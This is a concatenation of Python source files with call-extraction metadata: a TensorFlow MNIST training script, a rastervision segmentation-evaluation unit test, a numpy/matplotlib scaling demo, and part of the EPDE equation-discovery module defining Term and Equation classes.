L2_lambda * (tf.nn.l2_loss(W1) + tf.nn.l2_loss(B1) + tf.nn.l2_loss(W2) + tf.nn.l2_loss(B2))
tf.summary.scalar("L2_norm", L2_norm)
loss = L2_norm
else:
with tf.name_scope("xent"):
xent = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logit, labels=y_), name="xent")
tf.summary.scalar("xent", xent)
loss = xent
with tf.name_scope("train"):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(logit, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar("accuracy", accuracy)
summ = tf.summary.merge_all()
sess.run(tf.global_variables_initializer())
writer_train = tf.summary.FileWriter(LOGDIR + hparam + "_train")
writer_train.add_graph(sess.graph)
writer_test = tf.summary.FileWriter(LOGDIR + hparam + "_test")
writer_test.add_graph(sess.graph)
num_epochs = 200
# training accuracy
list_vacc = list()
for k in range(num_epochs):
print(str(k) + "th epoch")
for i in range(550):
if i % 100 == 0:
batch_xs, batch_ys = mnist.train.next_batch(100)
[train_accuracy, s_train] = sess.run([accuracy, summ],
feed_dict={x: batch_xs, y_: batch_ys})
writer_train.add_summary(s_train, k * 550 + i)
[test_accuracy, s_test] = sess.run([accuracy, summ],
feed_dict={x: mnist.test.images, y_: mnist.test.labels})
writer_test.add_summary(s_test, k * 550 + i)
print('Step {:d}, training accuracy {:g}'.format(k * 550 + i, train_accuracy))
print('Step {:d}, test accuracy {:g}'.format(k * 550 + i, test_accuracy))
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys, keep_prob: 0.5})
vacc = accuracy.eval(feed_dict={x: mnist.validation.images, y_: mnist.validation.labels, keep_prob: 1})
list_vacc.append(vacc)
if k > 10 and np.mean(list_vacc[-10:-5]) > np.mean(list_vacc[-5:]):
print("Seems like it starts to overfit, aborting the training")
break
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
def make_hparam_string(act_func, learning_rate, objective):
return "%s,lr_%.0E,%s" % (act_func, learning_rate, objective)
def main():
for act_func in ["sigmoid", "relu"]:
# You can try adding some more learning rates
for learning_rate in [1E-4]:
# Include "False" as a value to try different model architectures:
for objective in ["xent", "mean_sq_err", "L2_norm"]:
# def mnist_model(learning_rate, regularization, hparam):
hparam = make_hparam_string(act_func, learning_rate, objective)
print('Starting run for %s' % hparam)
# Actually run with the new settings
mnist_model(learning_rate, objective, hparam, act_func)
if __name__ == '__main__':
main()
|
[
"tensorflow.contrib.keras.losses.mean_squared_error",
"tensorflow.reset_default_graph",
"tensorflow.reshape",
"tensorflow.train.AdamOptimizer",
"tensorflow.matmul",
"numpy.mean",
"tensorflow.GPUOptions",
"tensorflow.truncated_normal",
"tensorflow.nn.softmax",
"tensorflow.nn.relu",
"tensorflow.nn.softmax_cross_entropy_with_logits",
"tensorflow.placeholder",
"tensorflow.cast",
"tensorflow.summary.histogram",
"tensorflow.summary.FileWriter",
"tensorflow.name_scope",
"datetime.datetime.now",
"tensorflow.summary.merge_all",
"tensorflow.summary.image",
"tensorflow.summary.scalar",
"tensorflow.global_variables_initializer",
"tensorflow.constant",
"tensorflow.argmax",
"tensorflow.examples.tutorials.mnist.input_data.read_data_sets",
"tensorflow.nn.l2_loss",
"tensorflow.nn.sigmoid"
] |
[((4916, 4971), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'input_data.read_data_sets', (['"""./MNIST_data"""'], {'one_hot': '(True)'}), "('./MNIST_data', one_hot=True)\n", (4941, 4971), False, 'from tensorflow.examples.tutorials.mnist import input_data\n'), ((601, 635), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""weights"""', 'w'], {}), "('weights', w)\n", (621, 635), True, 'import tensorflow as tf\n'), ((640, 673), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""biases"""', 'b'], {}), "('biases', b)\n", (660, 673), True, 'import tensorflow as tf\n'), ((678, 715), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""logits"""', 'logit'], {}), "('logits', logit)\n", (698, 715), True, 'import tensorflow as tf\n'), ((1317, 1341), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (1339, 1341), True, 'import tensorflow as tf\n'), ((1489, 1538), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 784]'], {'name': '"""x"""'}), "(tf.float32, [None, 784], name='x')\n", (1503, 1538), True, 'import tensorflow as tf\n'), ((1553, 1583), 'tensorflow.reshape', 'tf.reshape', (['x', '[-1, 28, 28, 1]'], {}), '(x, [-1, 28, 28, 1])\n', (1563, 1583), True, 'import tensorflow as tf\n'), ((1624, 1661), 'tensorflow.summary.image', 'tf.summary.image', (['"""input"""', 'x_image', '(3)'], {}), "('input', x_image, 3)\n", (1640, 1661), True, 'import tensorflow as tf\n'), ((1695, 1748), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 10]'], {'name': '"""labels"""'}), "(tf.float32, [None, 10], name='labels')\n", (1709, 1748), True, 'import tensorflow as tf\n'), ((1765, 1791), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {}), '(tf.float32)\n', (1779, 1791), True, 'import tensorflow as tf\n'), ((1896, 1916), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['logit'], {}), '(logit)\n', (1909, 1916), True, 'import tensorflow as tf\n'), ((3312, 3334), 'tensorflow.summary.merge_all', 'tf.summary.merge_all', ([], {}), '()\n', (3332, 3334), True, 'import tensorflow as tf\n'), ((3403, 3452), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(LOGDIR + hparam + '_train')"], {}), "(LOGDIR + hparam + '_train')\n", (3424, 3452), True, 'import tensorflow as tf\n'), ((3510, 3558), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (["(LOGDIR + hparam + '_test')"], {}), "(LOGDIR + hparam + '_test')\n", (3531, 3558), True, 'import tensorflow as tf\n'), ((306, 323), 'tensorflow.nn.relu', 'tf.nn.relu', (['logit'], {}), '(logit)\n', (316, 323), True, 'import tensorflow as tf\n'), ((349, 369), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['logit'], {}), '(logit)\n', (362, 369), True, 'import tensorflow as tf\n'), ((429, 481), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['[size_in, size_out]'], {'stddev': '(0.1)'}), '([size_in, size_out], stddev=0.1)\n', (448, 481), True, 'import tensorflow as tf\n'), ((513, 547), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {'shape': '[size_out]'}), '(0.1, shape=[size_out])\n', (524, 547), True, 'import tensorflow as tf\n'), ((572, 591), 'tensorflow.matmul', 'tf.matmul', (['input', 'w'], {}), '(input, w)\n', (581, 591), True, 'import tensorflow as tf\n'), ((833, 852), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (846, 852), True, 'import tensorflow as tf\n'), ((959, 993), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""weights"""', 'w'], {}), "('weights', w)\n", (979, 993), True, 'import tensorflow as tf\n'), ((1002, 1035), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""biases"""', 'b'], {}), "('biases', b)\n", (1022, 1035), True, 'import tensorflow as tf\n'), ((1044, 1084), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""activations"""', 'act'], {}), "('activations', act)\n", (1064, 1084), True, 'import tensorflow as tf\n'), ((2965, 2987), 'tensorflow.name_scope', 'tf.name_scope', (['"""train"""'], {}), "('train')\n", (2978, 2987), True, 'import tensorflow as tf\n'), ((3073, 3098), 'tensorflow.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (3086, 3098), True, 'import tensorflow as tf\n'), ((3260, 3299), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (3277, 3299), True, 'import tensorflow as tf\n'), ((3349, 3382), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (3380, 3382), True, 'import tensorflow as tf\n'), ((2000, 2028), 'tensorflow.name_scope', 'tf.name_scope', (['"""mean_sq_err"""'], {}), "('mean_sq_err')\n", (2013, 2028), True, 'import tensorflow as tf\n'), ((2134, 2179), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""mean_sq_err"""', 'mean_sq_err'], {}), "('mean_sq_err', mean_sq_err)\n", (2151, 2179), True, 'import tensorflow as tf\n'), ((3138, 3157), 'tensorflow.argmax', 'tf.argmax', (['logit', '(1)'], {}), '(logit, 1)\n', (3147, 3157), True, 'import tensorflow as tf\n'), ((3159, 3175), 'tensorflow.argmax', 'tf.argmax', (['y_', '(1)'], {}), '(y_, 1)\n', (3168, 3175), True, 'import tensorflow as tf\n'), ((3211, 3250), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (3218, 3250), True, 'import tensorflow as tf\n'), ((183, 197), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (195, 197), False, 'from datetime import datetime\n'), ((2071, 2120), 'tensorflow.contrib.keras.losses.mean_squared_error', 'tf.contrib.keras.losses.mean_squared_error', (['Y', 'y_'], {}), '(Y, y_)\n', (2113, 2120), True, 'import tensorflow as tf\n'), ((2261, 2285), 'tensorflow.name_scope', 'tf.name_scope', (['"""L2_norm"""'], {}), "('L2_norm')\n", (2274, 2285), True, 'import tensorflow as tf\n'), ((2624, 2661), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""L2_norm"""', 'L2_norm'], {}), "('L2_norm', L2_norm)\n", (2641, 2661), True, 'import tensorflow as tf\n'), ((2712, 2733), 'tensorflow.name_scope', 'tf.name_scope', (['"""xent"""'], {}), "('xent')\n", (2725, 2733), True, 'import tensorflow as tf\n'), ((2898, 2929), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""xent"""', 'xent'], {}), "('xent', xent)\n", (2915, 2929), True, 'import tensorflow as tf\n'), ((3010, 3047), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', (['learning_rate'], {}), '(learning_rate)\n', (3032, 3047), True, 'import tensorflow as tf\n'), ((4759, 4785), 'numpy.mean', 'np.mean', (['list_vacc[-10:-5]'], {}), '(list_vacc[-10:-5])\n', (4766, 4785), True, 'import numpy as np\n'), ((4788, 4811), 'numpy.mean', 'np.mean', (['list_vacc[-5:]'], {}), '(list_vacc[-5:])\n', (4795, 4811), True, 'import numpy as np\n'), ((1409, 1459), 'tensorflow.GPUOptions', 'tf.GPUOptions', ([], {'per_process_gpu_memory_fraction': '(0.4)'}), '(per_process_gpu_memory_fraction=0.4)\n', (1422, 1459), True, 'import tensorflow as tf\n'), ((2338, 2402), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'logit', 'labels': 'y_'}), '(logits=logit, labels=y_)\n', (2377, 2402), True, 'import tensorflow as tf\n'), ((2786, 2850), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'logit', 'labels': 'y_'}), '(logits=logit, labels=y_)\n', (2825, 2850), True, 'import tensorflow as tf\n'), ((2593, 2610), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['B2'], {}), '(B2)\n', (2606, 2610), True, 'import tensorflow as tf\n'), ((2573, 2590), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['W2'], {}), '(W2)\n', (2586, 2590), True, 'import tensorflow as tf\n'), ((2533, 2550), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['W1'], {}), '(W1)\n', (2546, 2550), True, 'import tensorflow as tf\n'), ((2553, 2570), 'tensorflow.nn.l2_loss', 'tf.nn.l2_loss', (['B1'], {}), '(B1)\n', (2566, 2570), True, 'import tensorflow as tf\n')]
|
import unittest
import numpy as np
from rastervision.core.class_map import (ClassItem, ClassMap)
from rastervision.evaluations.segmentation_evaluation import (
SegmentationEvaluation)
from rastervision.label_stores.segmentation_raster_file import (
SegmentationInputRasterFile)
from rastervision.label_stores.segmentation_raster_file_test import (
TestingRasterSource)
class TestSegmentationEvaluation(unittest.TestCase):
def test_compute(self):
class_map = ClassMap(
[ClassItem(id=1, name='one'),
ClassItem(id=2, name='two')])
raster_class_map = {'#010101': 1, '#020202': 2}
gt_array = np.ones((5, 5, 3), dtype=np.uint8)
gt_array[0, 0, :] = 0
gt_array[2, 2, :] = 2
gt_raster = TestingRasterSource(data=gt_array)
gt_label_store = SegmentationInputRasterFile(
source=gt_raster, raster_class_map=raster_class_map)
p_array = np.ones((4, 4, 3), dtype=np.uint8)
p_array[1, 1, :] = 0
p_raster = TestingRasterSource(data=p_array)
p_label_store = SegmentationInputRasterFile(
source=p_raster, raster_class_map=raster_class_map)
seval = SegmentationEvaluation()
seval.compute(class_map, gt_label_store, p_label_store)
tp1 = 16 - 3 # 4*4 - 3 true positives for class 1
fp1 = 1 # 1 false positive (2,2) and one don't care at (0,0)
fn1 = 1 # one false negative (1,1)
precision1 = float(tp1) / (tp1 + fp1)
recall1 = float(tp1) / (tp1 + fn1)
tp2 = 0 # 0 true positives for class 2
fn2 = 1 # one false negative (2,2)
precision2 = None # float(tp2) / (tp2 + fp2) where fp2 == 0
recall2 = float(tp2) / (tp2 + fn2)
self.assertAlmostEqual(precision1,
seval.class_to_eval_item[1].precision)
self.assertAlmostEqual(recall1, seval.class_to_eval_item[1].recall)
self.assertEqual(precision2, seval.class_to_eval_item[2].precision)
self.assertAlmostEqual(recall2, seval.class_to_eval_item[2].recall)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"numpy.ones",
"rastervision.core.class_map.ClassItem",
"rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile",
"rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource",
"rastervision.evaluations.segmentation_evaluation.SegmentationEvaluation"
] |
[((2129, 2144), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2142, 2144), False, 'import unittest\n'), ((658, 692), 'numpy.ones', 'np.ones', (['(5, 5, 3)'], {'dtype': 'np.uint8'}), '((5, 5, 3), dtype=np.uint8)\n', (665, 692), True, 'import numpy as np\n'), ((773, 807), 'rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource', 'TestingRasterSource', ([], {'data': 'gt_array'}), '(data=gt_array)\n', (792, 807), False, 'from rastervision.label_stores.segmentation_raster_file_test import TestingRasterSource\n'), ((833, 918), 'rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile', 'SegmentationInputRasterFile', ([], {'source': 'gt_raster', 'raster_class_map': 'raster_class_map'}), '(source=gt_raster, raster_class_map=raster_class_map\n )\n', (860, 918), False, 'from rastervision.label_stores.segmentation_raster_file import SegmentationInputRasterFile\n'), ((946, 980), 'numpy.ones', 'np.ones', (['(4, 4, 3)'], {'dtype': 'np.uint8'}), '((4, 4, 3), dtype=np.uint8)\n', (953, 980), True, 'import numpy as np\n'), ((1029, 1062), 'rastervision.label_stores.segmentation_raster_file_test.TestingRasterSource', 'TestingRasterSource', ([], {'data': 'p_array'}), '(data=p_array)\n', (1048, 1062), False, 'from rastervision.label_stores.segmentation_raster_file_test import TestingRasterSource\n'), ((1087, 1166), 'rastervision.label_stores.segmentation_raster_file.SegmentationInputRasterFile', 'SegmentationInputRasterFile', ([], {'source': 'p_raster', 'raster_class_map': 'raster_class_map'}), '(source=p_raster, raster_class_map=raster_class_map)\n', (1114, 1166), False, 'from rastervision.label_stores.segmentation_raster_file import SegmentationInputRasterFile\n'), ((1197, 1221), 'rastervision.evaluations.segmentation_evaluation.SegmentationEvaluation', 'SegmentationEvaluation', ([], {}), '()\n', (1219, 1221), False, 'from rastervision.evaluations.segmentation_evaluation import SegmentationEvaluation\n'), ((509, 536), 'rastervision.core.class_map.ClassItem', 'ClassItem', ([], {'id': '(1)', 'name': '"""one"""'}), "(id=1, name='one')\n", (518, 536), False, 'from rastervision.core.class_map import ClassItem, ClassMap\n'), ((551, 578), 'rastervision.core.class_map.ClassItem', 'ClassItem', ([], {'id': '(2)', 'name': '"""two"""'}), "(id=2, name='two')\n", (560, 578), False, 'from rastervision.core.class_map import ClassItem, ClassMap\n')]
|
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline 缩放
plt.style.use('ggplot')
plt.rcParams['figure.figsize'] = (12, 8)
# Normal distributed x and y vector with mean 0 and standard deviation 1
x = np.random.normal(0, 1, 200)
y = np.random.normal(0, 1, 200)
X = np.vstack((x, y)) # 2xn
# 缩放
sx, sy = 0.5, 2.0
Scale = np.array([[sx, 0], [0, sy]])
Y = Scale.dot(X)
# 原始点集
plt.scatter(X[0, :], X[1, :])
# 缩放后点
plt.scatter(Y[0, :], Y[1, :])
plt.title('Generated Data')
plt.axis('equal')
plt.show()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.style.use",
"numpy.array",
"numpy.random.normal",
"numpy.vstack"
] |
[((76, 99), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (89, 99), True, 'import matplotlib.pyplot as plt\n'), ((219, 246), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)', '(200)'], {}), '(0, 1, 200)\n', (235, 246), True, 'import numpy as np\n'), ((251, 278), 'numpy.random.normal', 'np.random.normal', (['(0)', '(1)', '(200)'], {}), '(0, 1, 200)\n', (267, 278), True, 'import numpy as np\n'), ((283, 300), 'numpy.vstack', 'np.vstack', (['(x, y)'], {}), '((x, y))\n', (292, 300), True, 'import numpy as np\n'), ((339, 367), 'numpy.array', 'np.array', (['[[sx, 0], [0, sy]]'], {}), '([[sx, 0], [0, sy]])\n', (347, 367), True, 'import numpy as np\n'), ((393, 422), 'matplotlib.pyplot.scatter', 'plt.scatter', (['X[0, :]', 'X[1, :]'], {}), '(X[0, :], X[1, :])\n', (404, 422), True, 'import matplotlib.pyplot as plt\n'), ((430, 459), 'matplotlib.pyplot.scatter', 'plt.scatter', (['Y[0, :]', 'Y[1, :]'], {}), '(Y[0, :], Y[1, :])\n', (441, 459), True, 'import matplotlib.pyplot as plt\n'), ((460, 487), 'matplotlib.pyplot.title', 'plt.title', (['"""Generated Data"""'], {}), "('Generated Data')\n", (469, 487), True, 'import matplotlib.pyplot as plt\n'), ((488, 505), 'matplotlib.pyplot.axis', 'plt.axis', (['"""equal"""'], {}), "('equal')\n", (496, 505), True, 'import matplotlib.pyplot as plt\n'), ((506, 516), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (514, 516), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 16:22:17 2021
@author: mike_ubuntu
"""
import numpy as np
from functools import reduce
import copy
import gc
import time
import datetime
import pickle
import warnings
import epde.globals as global_var
import torch
from epde.decorators import History_Extender, Reset_equation_status
from epde.interface.token_family import TF_Pool
from epde.factor import Factor
from epde.supplementary import Filter_powers, Population_Sort, flatten
import epde.moeadd.moeadd_stc as moeadd
def Check_Unqueness(obj, background):
return not any([elem == obj for elem in background])
def normalize_ts(Input):
# print('normalize_ts Input:', Input)
matrix = np.copy(Input)
# print(Matrix.shape)
if np.ndim(matrix) == 0:
raise ValueError('Incorrect input to the normalizaton: the data has 0 dimensions')
elif np.ndim(matrix) == 1:
return matrix
else:
for i in np.arange(matrix.shape[0]):
# print(matrix[i].shape)
std = np.std(matrix[i])
if std != 0:
matrix[i] = (matrix[i] - np.mean(matrix[i])) / std
else:
matrix[i] = 1
return matrix
class Complex_Structure(object):
def __init__(self, interelement_operator = np.add, *params):
self._history = ''
self.structure = None
self.interelement_operator = interelement_operator
def __eq__(self, other):
if type(other) != type(self):
raise ValueError('Type of self and other are different')
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure))
def set_evaluator(self, evaluator):
raise NotImplementedError('Functionality of this method has been moved to the evolutionary operator declaration')
def evaluate(self, structural = False):
assert len(self.structure) > 0, 'Attempt to evaluate an empty complex structure'
if len(self.structure) == 1:
return self.structure[0].evaluate(structural)
else:
# print([type(elem) for elem in self.structure])
return reduce(lambda x, y: self.interelement_operator(x, y.evaluate(structural)),
self.structure[1:], self.structure[0].evaluate(structural))
def reset_saved_state(self):
self.saved = {True:False, False:False}
self.saved_as = {True:None, False:None}
for elem in self.structure:
elem.reset_saved_state()
@property
def name(self):
pass
class Term(Complex_Structure):
__slots__ = ['_history', 'structure', 'interelement_operator', 'saved', 'saved_as',
'pool', 'max_factors_in_term', 'cache_linked', 'occupied_tokens_labels']
def __init__(self, pool, passed_term = None, max_factors_in_term = 1, forbidden_tokens = None,
interelement_operator = np.multiply):
super().__init__(interelement_operator)
self.pool = pool
self.max_factors_in_term = max_factors_in_term
if type(passed_term) == type(None):
self.Randomize(forbidden_tokens)
else:
self.Defined(passed_term)
if type(global_var.tensor_cache) != type(None):
self.use_cache()
self.reset_saved_state() # key - state of normalization, value - if the variable is saved in cache
@property
def cache_label(self):
if len(self.structure) > 1:
structure_sorted = sorted(self.structure, key = lambda x: x.cache_label)
cache_label = tuple([elem.cache_label for elem in structure_sorted])#reduce(form_label, structure_sorted, '')
else:
cache_label = self.structure[0].cache_label
return cache_label
def use_cache(self):
self.cache_linked = True
# print('structure:', self.structure)
for idx, _ in enumerate(self.structure):
if not self.structure[idx].cache_linked:
self.structure[idx].use_cache()
def Defined(self, passed_term):
self.structure = []
print('passed_term:', passed_term)
if isinstance(passed_term, (list, tuple)): #type(passed_term) == list or type(passed_term) == tuple:
for i, factor in enumerate(passed_term):
if type(factor) == str:
_, temp_f = self.pool.create(label = factor)
self.structure.append(temp_f)#; raise NotImplementedError
elif type(factor) == Factor:
self.structure.append(factor)
else:
raise ValueError('The structure of a term should be declared with str or factor.Factor obj, instead got', type(factor))
else: # Случай, если подается лишь 1 токен
if type(passed_term) == str:
_, temp_f = self.pool.create(label = passed_term)
self.structure.append(temp_f)#; raise NotImplementedError
elif type(passed_term) == Factor:
self.structure.append(passed_term)
else:
raise ValueError('The structure of a term should be declared with str or factor.Factor obj, instead got', type(passed_term))
def Randomize(self, forbidden_factors = None, **kwargs):
if np.sum(self.pool.families_cardinality(meaningful_only = True)) == 0:
raise ValueError('No token families are declared as meaningful for the process of the system search')
factors_num = np.random.randint(1, self.max_factors_in_term +1)
while True:
self.occupied_tokens_labels = []
occupied_by_factor, factor = self.pool.create(label = None, create_meaningful = True,
occupied = self.occupied_tokens_labels, **kwargs)
self.structure = [factor,]
self.occupied_tokens_labels.extend(occupied_by_factor)
factors_powers = {factor.label : 1}
for i in np.arange(1, factors_num):
occupied_by_factor, factor = self.pool.create(label = None, create_meaningful = False,
occupied = self.occupied_tokens_labels,
def_term_tokens = [token.label for token in self.structure],
**kwargs)
if factor.label in factors_powers:
factors_powers[factor.label] += 1
else:
factors_powers[factor.label] = 1
for param_idx, param_descr in factor.params_description.items():
if param_descr['name'] == 'power': power_param_idx = param_idx
if factors_powers[factor.label] == factor.params_description[power_param_idx]['bounds'][1]:
self.occupied_tokens_labels.append(factor.label)
self.structure.append(factor)
self.occupied_tokens_labels.extend(occupied_by_factor)
self.structure = Filter_powers(self.structure)
if type(forbidden_factors) == type(None):
break
elif all([(Check_Unqueness(factor, forbidden_factors) or not factor.status['unique_for_right_part']) for factor in self.structure]):
break
def evaluate(self, structural):
assert type(global_var.tensor_cache) != type(None), 'Currently working only with connected cache'
normalize = structural
if self.saved[structural] or (self.cache_label, normalize) in global_var.tensor_cache: #
value = global_var.tensor_cache.get(self.cache_label, normalized = normalize,
saved_as = self.saved_as[normalize])
value = value.reshape(value.size)
return value
else:
self.prev_normalized = normalize
value = super().evaluate(structural)
if normalize and np.ndim(value) != 1:
value = normalize_ts(value)
elif normalize and np.ndim(value) == 1 and np.std(value) != 0:
value = (value - np.mean(value))/np.std(value)
elif normalize and np.ndim(value) == 1 and np.std(value) == 0:
value = (value - np.mean(value))
if np.all([len(factor.params) == 1 for factor in self.structure]):
self.saved[normalize] = global_var.tensor_cache.add(self.cache_label, value, normalized = normalize) # Место возможных проблем: сохранение/загрузка нормализованных данных
if self.saved[normalize]: self.saved_as[normalize] = self.cache_label
value = value.reshape(value.size)
return value
def Filter_tokens_by_right_part(self, reference_target, equation, equation_position):
taken_tokens = [factor.label for factor in reference_target.structure if factor.status['unique_for_right_part']]
meaningful_taken = any([factor.status['meaningful'] for factor in reference_target.structure
if factor.status['unique_for_right_part']])
accept_term_try = 0
while True:
accept_term_try += 1
new_term = copy.deepcopy(self)
for factor_idx, factor in enumerate(new_term.structure):
if factor.label in taken_tokens:
new_term.Reset_occupied_tokens()
_, new_term.structure[factor_idx] = self.pool.create(create_meaningful=meaningful_taken,
occupied = new_term.occupied_tokens_labels + taken_tokens)
# print('try:', accept_term_try, 'suggested:', new_term.name)
#Возможная ошибка из-за (не) использования "create meaningful"
if Check_Unqueness(new_term, equation.structure[:equation_position] +
equation.structure[equation_position + 1 :]):
self.structure = new_term.structure
self.structure = Filter_powers(self.structure)
self.reset_saved_state()
break
if accept_term_try == 10:
warnings.warn('Can not create unique term, while filtering equation tokens in regards to the right part.')
if accept_term_try >= 10:
self.Randomize(forbidden_factors = new_term.occupied_tokens_labels + taken_tokens)
if accept_term_try == 100:
print('Something wrong with the random generation of term while running "Filter_tokens_by_right_part"')
print('proposed', new_term.name, 'for ', equation.text_form, 'with respect to', reference_target.name)
def Reset_occupied_tokens(self):
occupied_tokens_new = []
for factor in self.structure:
for token_family in self.pool.families:
if factor in token_family.tokens and factor.status['unique_token_type']:
occupied_tokens_new.extend([token for token in token_family.tokens])
elif factor.status['unique_specific_token']:
occupied_tokens_new.append(factor.label)
self.occupied_tokens_labels = occupied_tokens_new
@property
def available_tokens(self): #Переделать, т.к. меняется пул токенов: старая имплементация через лист
available_tokens = []
for token in self.pool.families:
if not all([label in self.occupied_tokens_labels for label in token.tokens]):
token_new = copy.deepcopy(token)
token_new.tokens = [label for label in token.tokens if label not in self.occupied_tokens_labels]
available_tokens.append(token_new)
return available_tokens
@property
def total_params(self):
return max(sum([len(element.params) - 1 for element in self.structure]), 1)
@property
def name(self):
form = ''
for token_idx in range(len(self.structure)):
form += self.structure[token_idx].name
if token_idx < len(self.structure) - 1:
form += ' * '
return form
@property
def contains_deriv(self):
return any([factor.is_deriv and factor.deriv_code != [None,] for factor in self.structure])
@property
def solver_form(self):
deriv_orders = []
deriv_powers = []
try:
coeff_tensor = np.ones_like(global_var.grid_cache.get('0'))
except KeyError:
raise NotImplementedError('No cache implemented')
for factor in self.structure:
if factor.is_deriv:
for param_idx, param_descr in factor.params_description.items():
if param_descr['name'] == 'power': power_param_idx = param_idx
deriv_orders.append(factor.deriv_code); deriv_powers.append(factor.params[power_param_idx])
else:
coeff_tensor = coeff_tensor * factor.evaluate()
# deriv_orders.append(factor.deriv_code); deriv_powers.append(1)
if len(deriv_powers) == 1:
deriv_powers = deriv_powers[0]
deriv_orders = deriv_orders[0]
coeff_tensor = torch.from_numpy(coeff_tensor)
return [coeff_tensor, deriv_orders, deriv_powers]
def __eq__(self, other):
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure))
class Equation(Complex_Structure):
__slots__ = ['_history', 'structure', 'interelement_operator', 'saved', 'saved_as',
'n_immutable', 'pool', 'terms_number', 'max_factors_in_term', 'operator',
'_target', 'target_idx', '_features', 'right_part_selected',
'_weights_final', 'weights_final_evald', '_weights_internal', 'weights_internal_evald',
'fitness_calculated', 'solver_form_defined', '_solver_form', '_fitness_value',
'crossover_selected_times', 'elite']
def __init__(self, pool, basic_structure, terms_number = 6, max_factors_in_term = 2,
interelement_operator = np.add): #eq_weights_eval
"""
Class for the single equation for the dynamic system.
attributes:
structure : list of Term objects \r\n
List, containing all terms of the equation; first 2 terms are reserved for constant value and the input function;
target_idx : int \r\n
Index of the target term, selected in the Split phase;
target : 1-d array of float \r\n
values of the Term object, reshaped into 1-d array, designated as target for application in sparse regression;
features : matrix of float \r\n
matrix, composed of terms, not included in target, value columns, designated as features for application in sparse regression;
fitness_value : float \r\n
Inverse value of squared error for the selected target 2function and features and discovered weights;
estimator : sklearn estimator of selected type \r\n
parameters:
Matrix of derivatives: first axis through various orders/coordinates in order: ['1', 'f', all derivatives by one coordinate axis
in increasing order, ...]; second axis: time, further - spatial coordinates;
tokens : list of strings \r\n
Symbolic forms of functions, including derivatives;
terms_number : int, base value of 6 \r\n
Maximum number of terms in the discovered equation;
max_factors_in_term : int, base value of 2\r\n
Maximum number of factors, that can form a term (e.g. with 2: df/dx_1 * df/dx_2)
"""
super().__init__(interelement_operator)
self.reset_state()
self.n_immutable = len(basic_structure)
# print('n_immutable', self.n_immutable)
self.pool = pool
self.structure = []
self.terms_number = terms_number; self.max_factors_in_term = max_factors_in_term
self.operator = None
if (terms_number < self.n_immutable):
raise Exception('Number of terms ({}) is too low to even contain all of the pre-determined ones'.format(terms_number))
for passed_term in basic_structure:
if isinstance(passed_term, Term):
self.structure.append(passed_term)
elif isinstance(passed_term, str):
self.structure.append(Term(self.pool, passed_term = passed_term,
max_factors_in_term = self.max_factors_in_term))
for i in range(len(basic_structure), terms_number):
check_test = 0
while True:
check_test += 1
new_term = Term(self.pool, max_factors_in_term = self.max_factors_in_term, passed_term = None)
